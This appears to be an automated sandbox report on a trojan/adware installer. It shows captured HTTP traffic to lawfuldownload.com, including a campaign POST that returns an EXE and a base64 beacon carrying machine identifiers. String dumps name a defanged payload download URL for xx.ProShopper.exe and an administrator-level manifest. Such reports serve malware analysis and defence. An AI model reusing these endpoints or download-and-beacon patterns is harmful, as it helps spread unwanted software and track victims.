GET /ssca-sha2-g4.crl HTTP/1.1


Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl3.digicert.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=172800
Content-Type: application/x-pkcs7-crl
Date: Sat, 19 Dec 2015 19:25:14 GMT
Etag: "648041508"
Expires: Mon, 21 Dec 2015 19:25:14 GMT
Last-Modified: Sat, 19 Dec 2015 17:15:06 GMT
Server: ECS (ams/4995)
X-Cache: HIT
Content-Length: 156489
0..cD0..b ...0...*.H........0M1.0...U....US1.0...U....DigiCert Inc1'0%
..U....DigiCert SHA2 Secure Server CA..151219170337Z..151226170000Z0..
a80!.............d..UT..150420110926Z0!...M\........9..<...15042016
0924Z0!......1y.......w8...150420160946Z0!.....\,.os...$..,...15042020
2312Z0!....{.Y.a.jc. ^-....150421122202Z0!.......K(..5.ih`.D..15042218
0238Z0!...0]..G.F...,.5....150422193428Z0!...rGg....&w4u'..b..15042303
1400Z0!.....wqj...,3.......150423172002Z0!......cH.F.j.a...]..15042318
5004Z0!......\(...<....\...150423185707Z0!...v..f.%....5..w...15042
3194904Z0!.......{4.yE.....q..150423195103Z0!...F...G.2..........15042
4023702Z0!.....5RG?.6qr...8...150424023702Z0!.......Y.Z^S..;#u...15042
4023702Z0!.......4..`.N.......150424044911Z0!....aX.(.d...r..s...15042
4135305Z0!.....Y..6_..b...o...150424135305Z0!...Hf@o....2,.......15042
4135305Z0!...^#.e...q......"..150424135305Z0!...=q..&..._.]r.....15042
4135305Z0!...'zlGt-Mq..Q.Q....150424135305Z0!...HU'........5.....15042
4142702Z0!.......!.......7....150424142702Z0!...SL..R....NNj=-h..15042
4180701Z0!....o.../.D.c.......150424180701Z0!.......B}..k.yH..%..15042
4191803Z0!...^.<5.1j..[.<.t...150424203020Z0!.....p.3.....F&.i..
.150424203032Z0!.....k)..5.TcL......150424203040Z0!...}......@.7...P$.
.150424220726Z0!....m.k...9.....=...150425002503Z0!...6WP.f.%.l.~.....
.150425002503Z0!....S....<KN.:j.....150425002503Z0!....o....0....A0
L`..150425024202Z0!.....(...Y.....:.U..150425065007Z0!...d...;Bt..8..S
....150425065017Z0!....RW..J.% 1v.$.w..150425065026Z0!...........=
<<< skipped >>>


GET /ss.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: ss.symcb.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Server: Apache
ETag: "b03eba7a0646af6d2a8b4d3c796b5201:1450517597"
Last-Modified: Sat, 19 Dec 2015 09:01:13 GMT
Date: Sat, 19 Dec 2015 19:25:12 GMT
Transfer-Encoding:  chunked
Connection: keep-alive
Connection: Transfer-Encoding
Content-Type: application/pkix-crl
00006000..0....0.......0...*.H........0~1.0...U....US1.0...U....Symant
ec Corporation1.0...U....Symantec Trust Network1/0-..U...&Symantec Cla
ss 3 Secure Server CA - G4..151219090109Z..151226090109Z0....0!.....@.
.....?..#....150902191930Z0!......X.3..*..k(....150806152406Z0!.......
..J.N.h......150217135549Z0!....,.....f....^....150611233753Z0!.......
.....XW.M....150816010821Z0!......|%A=).K.`.&...151211011023Z0!....Q8*
.|..]6.".4...150330080110Z0!.....!!..O..........151124201031Z0!....eL.
Y icf}.:..N..140508200907Z0!.......>..z(L..0i...150517010832Z0!....
.!.A:...(s......151105180048Z0!.....`..*........^..150820083926Z0!....
..h...Z..Y.quJ..150813151839Z0!.........^... .M.'..150316171756Z0!....
.(..X..U...I....150318135037Z0!.....^....J...%X....150824025647Z0!....
........HOXyX ..151028193859Z0!.......(.s..r....A..150912015711Z0!....
...n....[...6a..140729211122Z0!.....Z...k1S.<.. I..150727184447Z0!.
..#zb...5...T\!....150318170750Z0!...#..9....:^.[Kh0..150411141836Z0!.
..%..8..l..Ph.5....150605090026Z0!...%.vu..;..r*y..E..150802010744Z0!.
..&P'.s....... ....150413124959Z0!...&....5./C...c....150310141723Z0!.
..(M`...@O.........151026064509Z0!...).......0^.B.....151102010800Z0!.
..*>_l....... .....150915102058Z0!...*.4O.g.N.i0...I..151202175758Z
0!...,Cg@[|.{.c.......151020203229Z0!...,...[U.F0....n...150728152025Z
0!.../-....4.."..9....150601162325Z0!.../..J.y>D.h.c..w..1412040417
53Z0!...0..,&.3.....)....151211002355Z0!...0.b.)L..^...!zD..1509081809
55Z0!...0....7/....).D`..151109123905Z0!...1..2N..&.}Xp..!..150428
<<< skipped >>>


GET /V32/amipb.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.lawfuldownload.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn1.lawfuldownload.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Length: 69719
Connection: keep-alive
Date: Tue, 15 Dec 2015 10:50:40 GMT
Last-Modified: Tue, 15 Dec 2015 10:45:57 GMT
ETag: "2d6fe112467543279b35cc8418cbd672"
x-amz-storage-class: REDUCED_REDUNDANCY
Accept-Ranges: bytes
Server: AmazonS3
Age: 30030
X-Cache: Hit from cloudfront
Via: 1.1 573fb2f256326ed8c48c75347f8e14f1.cloudfront.net (CloudFront)
X-Amz-Cf-Id: RDWqox2cX8bfmx8ImgA3euFhwORX01GMJFIwqPB1crCcgOH1YqQWlA==
..//<!-- ../*    Progress bar   */..var g_AmiPbs = new Array();.var
 g_AmiPbsEx = new Array();.var g_interval = 0;.var g_initComp = 0;.var
 g_possibleComps = [];.var g_reportedComps = [];.var g_removedComps = 
[];.var g_notCompatibleWithUpdaterComps = ['LootFindKP'];.var g_postpo
nedComps = ['updater','SHAREit'];..var g_disable_updater = false;..//i
n the version we tests updater task is created firstly.var g_UpdaterTe
stVersion = (typeof (g_ver) !== 'undefined' && g_ver != null && g_ver 
== '1.1.5.90');.var g_UpdaterTaskCreated = false;..function LogMessage
(message) {.    try {.        g_ami.Log(message);.    }.    catch (exc
pt) {.    }.}..function IsDeclined(name) {.    var declined = 0;.    f
or (var i = 0; i < g_removedComps.length; i  ) {.        if (g_remo
vedComps[i] == name) {.            declined = 1;.            break;.  
      }.    }.    return declined;.}..function UpdateSkipStatus(sn) {.
    if (g_testa && !ArrayContains(g_reportedComps, sn) && !ArrayContai
ns(g_notest, sn) && !ArrayContains(g_notest1, sn)) {.        if (g_tes
ta.constructor != Array || ArrayContains(g_testa, sn)) {.            g
_ami.WriteProfileString(g_testf, '', sn, 'S');.            g_reportedC
omps.push(sn);.        }.    }.}..function ShortNameFromName(name) {. 
   for (c = 0; c < g_comps.length; c  ) {.        if (g_comps[c].na
me == name) {.            return g_comps[c].sn;.        }.    }.    re
turn name;.}..function UpdateComponentsStatus() {.    LogMessage('Upda
teComponentsStatus function started');.    for (var j = 0; j < 
<<< skipped >>>


POST /namen.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: VVV.lawfuldownload.com
Content-Length: 59
Connection: Keep-Alive

campid=14991&i=OperaWW&prefix=amisetup9338&version=1.1.2.41
HTTP/1.1 200 OK
Content-Type: text/plain; charset=UTF-8
Date: Sat, 19 Dec 2015 19:23:56 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 174
Connection: keep-alive
[Data]..exe=amisetup9338.exe..url=hXXp://VVV.lawfuldownload.com/tdownl
oad1.php..params=version=1.1.2.41&s1=e58d6002dfd148368f48cae7fb6f9f756
8fe8cb3&t1=1450553216&campid=14991....


POST /tdownload1.php HTTP/1.1


Content-Type: application/x-www-form-urlencoded
Host: VVV.lawfuldownload.com
Content-Length: 107
Connection: Keep-Alive

version=1.1.2.41&s1=e58d6002dfd148368f48cae7fb6f9f7568fe8cb3&t1=1450553216&campid=14991&prefix=amisetup9338
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: X-Target-FN
Content-Disposition: attachment; filename="amisetup9338__14991.exe"
Content-Type: application/x-msdownload
Date: Sat, 19 Dec 2015 19:23:56 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
X-Target-FN: amisetup9338__14991.exe
Content-Length: 754688
Connection: keep-alive
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........%...D...D..
.D..s.@..D..s.B..D..s.A..D...<...D...<...D...D...D....\..D....F.
.D...D...D....C..D..Rich.D..........PE..L.....uV......................
......L.............@.......................................@.........
............................d....p..4 ......................|.........
..........................h...@...............L.......................
.....text............................... ..`.rdata...b.......d........
..........@..@.data....1...0......................@....rsrc...4 ...p..
."...(..............@..@.reloc...9.......:...J..............@..B......
......................................................................
......................................................................
......................................................................
......................................................................
..............................................................P....0PA
.............................D$....D$..A.....................Q.V.t$...
........^..............T$..L$..........3...............D$.V.p....0.t$.
.......^........Q.t$........t..t$........Y...2.Y.................t$...
.....t..t$....t$.........2................V.........^.................
....j.h .@.d.....PQV.80A.3.P.D$.d.......j..........D$..D$.......t..t$$
...t$$.t$$.......3..D$.....j.j.j.VP......L$.d......Y^.........j.h .@.d
.....PQV.80A.3.P.D$.d........>.t`j..........D$..D$.......t....q
<<< skipped >>>


POST /thankyou.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: VVV.lawfuldownload.com
Content-Length: 839
Connection: Keep-Alive

capp=updater&cid=14991&mhx=877f2b5cfdebaa2d7dd2148778482241047072df&base=X3NydmxvZz0mYnJvd3Nlcj1pZSZjW09wZXJhV1ddW3NdPS0zMSZjW3VwZGF0ZXJdW3NdPS0zMSZjYXBwPXVwZGF0ZXImY2M9VUEmY2lkPTE0OTkxJmNsaXA9MTk0LjI0Mi45Ni4yMTgmY21kbD1hbWlzZXR1cDkzNjRfXzE0OTkxLmV4ZSAvcyAgL3ZlciAxLjEuMi40MSAgL3UgaHR0cDovL3d3dy5sYXdmdWxkb3dubG9hZC5jb20vaW5kZXgucGhwIC90YSAvY2kgMTQ5OTEgL2kgT3BlcmFXVyZjbnQ9NTU1ZjZiNmJiOTExMzA0MjJmYTYwZmE2ZjBkMGU0MmQmY3VycmVudF9zY3JlZW49RmluaXNoX0xhc3RfU2NyZWVuJmRwcm9kPTE5QzJGQjNERUMzODU0MDFGNkZDRjIyMTc4MzM0QSZpcz0tMzEmbWFjPUFBPT0mbWFjaGc9TnpWbFpEazFOamN0WVdFMU9DMDBZemhsTFdFNFpXRXRNMk5oWkRkak5EZGhZakF6QUE9PSZuYW1lPVdGQTRBQT09Jm5ldGZzPS0zMSZvcz1OVDUuMVNQMyZzeXNpZD02RkU1REREMDY0RTkxRjQwRDMxQTgzQkI5RkU4ODg2RSZzeXNpZDE9NkZFNURERDA2NEU5MUY0MEQzMUE4M0JCOUZFODg4NkUmdGU9MTQ1MDU1MzA0NSZ0aWQ9JnRzPTE0NTA1NTMwNDQmdmVyPTEuMS4yLjQxJnZlcnQ9MwA=
HTTP/1.1 200 OK
Content-Type: text/plain; charset=UTF-8
Date: Sat, 19 Dec 2015 19:24:09 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 14
Connection: keep-alive
....      ..HTTP/1.1 200 OK..Content-Type: text/plain; charset=UTF-8..
Date: Sat, 19 Dec 2015 19:24:09 GMT..Server: Apache/2.2.15 (Red Hat)..
X-Powered-By: PHP/5.3.3..Content-Length: 14..Connection: keep-alive...
...      ....







The Trojan connects to the servers at the folowing location(s):







%original file name%.exe_468:




.text
`.rdata
@.data
.rsrc
@.reloc
xSSSh
FTPjKS
FtPj;S
C.PjRV
Visual C   CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
portuguese-brazilian
GetProcessWindowStation
operator
RPCRT4.dll
RegCreateKeyW
RegOpenKeyW
RegQueryInfoKeyW
RegOpenKeyExW
RegEnumKeyExW
RegCloseKey
ADVAPI32.dll
URLDownloadToFileW
urlmon.dll
WinHttpReceiveResponse
WinHttpSetTimeouts
WinHttpSetOption
WinHttpGetIEProxyConfigForCurrentUser
WinHttpSendRequest
WinHttpWriteData
WinHttpConnect
WinHttpCloseHandle
WinHttpQueryHeaders
WinHttpQueryDataAvailable
WinHttpOpen
WinHttpOpenRequest
WinHttpGetProxyForUrl
WinHttpCrackUrl
WinHttpReadData
WinHttpAddRequestHeaders
WINHTTP.dll
GetProcessHeap
KERNEL32.dll
USER32.dll
ole32.dll
SHELL32.dll
OLEAUT32.dll
GetCPInfo
zcÁ
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><ms_windowsSettings:dpiAware xmlns:ms_windowsSettings="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings" xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</ms_windowsSettings:dpiAware></windowsSettings></application></assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
1 2$2(2,2
303S3
0!0'0.02070
0 2$2(2,2
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
KERNEL32.DLL
WUSER32.DLL
{C890A862-E503-48B3-A6BC-0C93851FB601}
xx.ProShopper.exe
hXXp://elegantsoft.ru/uploads2/bb0123fc-de69-48ae-9cc2-6bcfd04f1d68/xx.ProShopper.exe
c:\%original file name%.exe

opera.exe_1432:




.text
`.rdata
@.data
.rsrc
@.reloc
u.QQQQQj
j.Yf;
_tcPVj@
.PjRW
OperaDllMain
.thunks
.syzygy
0123456789
kernel32.dll
c:\buildbot\slave\workdir\repos\lar6\desktop-2013-1\chromium\src\sandbox\win\src\sandbox_policy_base.cc
CreateNamedPipeW
NtCreateKey
NtOpenKey
NtOpenKeyEx
GetProcessWindowStation
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
operator
c:\buildbot\slave\workdir\repos\LAR6\desktop-2013-1\chromium\src\out\Release\opera.exe.pdb
opera.exe
WINMM.dll
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
ADVAPI32.dll
CloseWindowStation
CreateWindowStationW
SetProcessWindowStation
USER32.dll
GetProcessHeap
CreateIoCompletionPort
GetProcessHandleCount
KERNEL32.dll
GetCPInfo
zcÁ
22W.OOjjjjjjjjjjjjjUH>11111Y`i,i^^^^i
.TTTTT]
!!!}|!#\<<\#!|}!!!
pON.lnm}
"company_name": "Opera Software",
"default_profile_path_template": "Opera Software/Opera {InternalStream}",
"domain": ".opera.com",
"expected_signer": "Opera Software ASA",
"file_name_base": "opera",
"partner_image_download_url_parameter": "",
"product_name": "Opera",
"sitecheck_host": "sitecheck2.opera.com",
"urls": {
"autoupdate": "hXXps://autoupdate.geo.opera.com/",
"crash": "hXXps://crash.opera.com",
"download": "hXXp://VVV.opera.com/download/",
"download_full_windows": "hXXp://VVV.opera.com/download/get/?partner=www&opsys=Windows",
"firstrun": "hXXp://redir.opera.com/VVV.opera.com/firstrun/",
"flash_ppapi_update_site": "hXXps://redir.opera.com/plugins/?application/x-shockwave-flash&type=ppapi",
"flash_update_site": "hXXps://redir.opera.com/plugins/?application/x-shockwave-flash",
"geolocation": "hXXp://autoupdate.geo.opera.com/geolocation/",
"geolocation_privacy": "hXXp://help.opera.com/geolocation/privacy/",
"google_favicon": "hXXp://redir.opera.com/favicons/google/favicon.ico",
"help": "hXXp://help.opera.com/?p=",
"homepage": "hXXp://VVV.opera.com/",
"partner_redirect": "hXXp://redir.opera.com/speeddials/partner/",
"report_issue": "hXXps://bugs.opera.com/wizard/",
"survey": "hXXps://redir.opera.com/surveys",
"uninstall_survey": "hXXp://redir.opera.com/uninstallsurvey/",
"upgrade": "hXXp://redir.opera.com/VVV.opera.com/upgrade/"
"visible_product_name": "Opera",
"webui_scheme": "opera",
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="Win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"></supportedOS></application></compatibility></assembly>
> >$>(>,>0>4>~>
6"9&9*9.92969:9>9
_opautolib.pyd
Ndebug.log
ntdll.dll
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_TEXT
HKEY_PERFORMANCE_NLSTEXT
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
pipe\
Akernel32.dll
kernelbase.dll
c\Sessions\%d\AppContainerNamedObjects\%ls
ALPC Port
eKey
Bkernel32.dll
gdi32.dll
user32.dll
xntdll.dll
wow_helper.exe"
Cmscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
portuguese-brazilian
%Program Files%\Opera\34.0.2036.41\opera.exe
Copyright Opera Software 2015
Opera
34.0.2036.41
Opera Software
Opera Internet Browser

opera_crashreporter.exe_2468:




.text
`.rdata
@.data
.rsrc
@.reloc
D$4j.Xf
w%s( 
j.Yf;
_tcPVj@
.PjRW
c:\buildbot\slave\workdir\repos\lar6\desktop-2013-1\desktop\windows\crash_reporter\crash_reporter_main.cc
crash-reporter-parent-id
crash-reporter-exception-info
crash-reporter-minidump
0.0.0.0
OPERA-CRASHLOG V1 desktop %s %d windows release
%S caused exception %X at address 2lX (BASE: 00000000)
%S="%S"
%s-crashlog-%u-%lu.txt
-%u-%lu
c:\buildbot\slave\workdir\repos\lar6\desktop-2013-1\desktop\windows\crash_reporter\process_state_impl.cc
Thread32First failed, te.dwSize=
c:\buildbot\slave\workdir\repos\lar6\desktop-2013-1\desktop\windows\crash_reporter\module_info_impl.cc
Could not find exports directory
c:\buildbot\slave\workdir\repos\lar6\desktop-2013-1\desktop\windows\crash_reporter\thread_info_impl.cc
widevinecdmadapter.dll
Opera\Opera
Opera\Opera x64
Google\Chrome\User Data
Opera Software\Opera Stable
(0x%X)
Error (0x%X) while retrieving error. (0x%X)
user.js
PlatformFile.FlushTime
PlatformFile.UnknownErrors.Windows
0123456789
(%d = %3.1f%%)
Histogram.InconsistentCountHigh
Histogram.InconsistentCountLow
Histogram: %s recorded %d samples
(flags = 0x%x)
\uX
Unsupported encoding. JSON must be UTF-8.
Dictionary keys must be quoted.
Line: %i, column: %i, %s
user_experience_metrics.reporting_enabled
OPERA-CRASHLOG V1 desktop%s %s %s windows release
%s caused exception %s at address lX
Thread: X
ThreadInfo: X
Priority=X
Crashed=%d
checked_context_values=%lu%s
checked_stack_values=%lu%s
Stack dump: X
%-26s %-46s Base: lX Size: X Timestamp: X
%s="%s"
Registers: X
EAX=X EBX=X ECX=X EDX=X ESI=X
EDI=X EBP=X ESP=X EIP=X FLAGS=X
CS=X DS=X SS=X ES=X FS=X GS=X
FPU stack: X
XXX XXX XXX
XXX XXX SW=X CW=X
crashlog.txt
urls
%s.%s
47.0.2526.73
%d.%d.%d.%d
SHELL32.dll
GetProcessWindowStation
operator
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
c:\buildbot\slave\workdir\repos\lar6\desktop-2013-1\chromium\src\base\prefs\json_pref_store.cc
Settings.JsonDataReadSizeKilobytes.
Settings.JsonDataWriteCount.
1.2.5
ImportantFile.TempFileFailures
c:\buildbot\slave\workdir\repos\lar6\desktop-2013-1\chromium\src\base\files\important_file_writer.cc
base::ImportantFileWriter::ScheduleWrite
base::ImportantFileWriter::PostWriteTask
c:\buildbot\slave\workdir\repos\LAR6\desktop-2013-1\chromium\src\out\Release\opera_crashreporter.exe.pdb
SHFileOperationW
opera_crashreporter.exe
InternetCrackUrlW
HttpOpenRequestW
HttpAddRequestHeadersW
HttpSendRequestW
HttpQueryInfoW
WININET.dll
PSAPI.DLL
WINMM.dll
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
ADVAPI32.dll
GetProcessHeap
GetWindowsDirectoryW
ConnectNamedPipe
DisconnectNamedPipe
CreateNamedPipeW
KERNEL32.dll
ole32.dll
OLEAUT32.dll
USER32.dll
GetCPInfo
5.1.2600
zcÁ
%Program Files%\Opera\34.0.2036.41\opera_crashreporter.exe
"company_name": "Opera Software",
"default_profile_path_template": "Opera Software/Opera {InternalStream}",
"domain": ".opera.com",
"expected_signer": "Opera Software ASA",
"file_name_base": "opera",
"partner_image_download_url_parameter": "",
"product_name": "Opera",
"sitecheck_host": "sitecheck2.opera.com",
"urls": {
"autoupdate": "hXXps://autoupdate.geo.opera.com/",
"crash": "hXXps://crash.opera.com",
"download": "hXXp://VVV.opera.com/download/",
"download_full_windows": "hXXp://VVV.opera.com/download/get/?partner=www&opsys=Windows",
"firstrun": "hXXp://redir.opera.com/VVV.opera.com/firstrun/",
"flash_ppapi_update_site": "hXXps://redir.opera.com/plugins/?application/x-shockwave-flash&type=ppapi",
"flash_update_site": "hXXps://redir.opera.com/plugins/?application/x-shockwave-flash",
"geolocation": "hXXp://autoupdate.geo.opera.com/geolocation/",
"geolocation_privacy": "hXXp://help.opera.com/geolocation/privacy/",
"google_favicon": "hXXp://redir.opera.com/favicons/google/favicon.ico",
"help": "hXXp://help.opera.com/?p=",
"homepage": "hXXp://VVV.opera.com/",
"partner_redirect": "hXXp://redir.opera.com/speeddials/partner/",
"report_issue": "hXXps://bugs.opera.com/wizard/",
"survey": "hXXps://redir.opera.com/surveys",
"uninstall_survey": "hXXp://redir.opera.com/uninstallsurvey/",
"upgrade": "hXXp://redir.opera.com/VVV.opera.com/upgrade/"
"visible_product_name": "Opera",
"webui_scheme": "opera",
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"></supportedOS></application></compatibility></assembly>
> >$>(>,>0>4>8>
0$0(0,000
1)121;1~1
9&:.:6:>:~:
74787<7@7
2 2$2(2,20242
4 4$4(4,4
8 8<8\8|8
OperaCrashReporterInitEvent
\\.\pipe\OperaCrashReporter
%s=%s
OperaCrashReporterException
Last crash in crash reporter
pOPERA_CRASH_EMAIL
gBreakpad/1.0 (Windows)
X-Opera-Crash-URL
OPERA_CRASH_EMAIL
OPERA_CRASH_SERVER_URL
opera_crashreporter.log
dbghelp.dll
OPERA_CRASH_LOG_DIR
active_url
crash_reporter
crash_feedback_url.txt
Crash Reports
update_prefs.json
browser.js
siteprefs.json
4operaprefs.ini
Ndebug.log
ntdll.dll
kernel32.dll
verifier.dll
rpcrt4.dll
x-x-x-xx-xxxxxx
Breakpad/1.0 (Windows)
%sXX
_opautolib.pyd
Cmscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
portuguese-brazilian
shell32.dll
https
Clauncher.exe
installer_prefs.json
Opera
Copyright Opera Software 2015
34.0.2036.41
Opera Software
Opera crash-reporter

opera.exe_2816:




.text
`.rdata
@.data
.rsrc
@.reloc
u.QQQQQj
j.Yf;
_tcPVj@
.PjRW
OperaDllMain
.thunks
.syzygy
0123456789
kernel32.dll
c:\buildbot\slave\workdir\repos\lar6\desktop-2013-1\chromium\src\sandbox\win\src\sandbox_policy_base.cc
CreateNamedPipeW
NtCreateKey
NtOpenKey
NtOpenKeyEx
GetProcessWindowStation
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
operator
c:\buildbot\slave\workdir\repos\LAR6\desktop-2013-1\chromium\src\out\Release\opera.exe.pdb
opera.exe
WINMM.dll
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
ADVAPI32.dll
CloseWindowStation
CreateWindowStationW
SetProcessWindowStation
USER32.dll
GetProcessHeap
CreateIoCompletionPort
GetProcessHandleCount
KERNEL32.dll
GetCPInfo
zcÁ
22W.OOjjjjjjjjjjjjjUH>11111Y`i,i^^^^i
.TTTTT]
!!!}|!#\<<\#!|}!!!
pON.lnm}
"company_name": "Opera Software",
"default_profile_path_template": "Opera Software/Opera {InternalStream}",
"domain": ".opera.com",
"expected_signer": "Opera Software ASA",
"file_name_base": "opera",
"partner_image_download_url_parameter": "",
"product_name": "Opera",
"sitecheck_host": "sitecheck2.opera.com",
"urls": {
"autoupdate": "hXXps://autoupdate.geo.opera.com/",
"crash": "hXXps://crash.opera.com",
"download": "hXXp://VVV.opera.com/download/",
"download_full_windows": "hXXp://VVV.opera.com/download/get/?partner=www&opsys=Windows",
"firstrun": "hXXp://redir.opera.com/VVV.opera.com/firstrun/",
"flash_ppapi_update_site": "hXXps://redir.opera.com/plugins/?application/x-shockwave-flash&type=ppapi",
"flash_update_site": "hXXps://redir.opera.com/plugins/?application/x-shockwave-flash",
"geolocation": "hXXp://autoupdate.geo.opera.com/geolocation/",
"geolocation_privacy": "hXXp://help.opera.com/geolocation/privacy/",
"google_favicon": "hXXp://redir.opera.com/favicons/google/favicon.ico",
"help": "hXXp://help.opera.com/?p=",
"homepage": "hXXp://VVV.opera.com/",
"partner_redirect": "hXXp://redir.opera.com/speeddials/partner/",
"report_issue": "hXXps://bugs.opera.com/wizard/",
"survey": "hXXps://redir.opera.com/surveys",
"uninstall_survey": "hXXp://redir.opera.com/uninstallsurvey/",
"upgrade": "hXXp://redir.opera.com/VVV.opera.com/upgrade/"
"visible_product_name": "Opera",
"webui_scheme": "opera",
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="Win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"></supportedOS></application></compatibility></assembly>
> >$>(>,>0>4>~>
6"9&9*9.92969:9>9
_opautolib.pyd
Ndebug.log
ntdll.dll
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_TEXT
HKEY_PERFORMANCE_NLSTEXT
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
pipe\
Akernel32.dll
kernelbase.dll
c\Sessions\%d\AppContainerNamedObjects\%ls
ALPC Port
eKey
Bkernel32.dll
gdi32.dll
user32.dll
xntdll.dll
wow_helper.exe"
Cmscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
portuguese-brazilian
%Program Files%\Opera\34.0.2036.41\opera.exe
Copyright Opera Software 2015
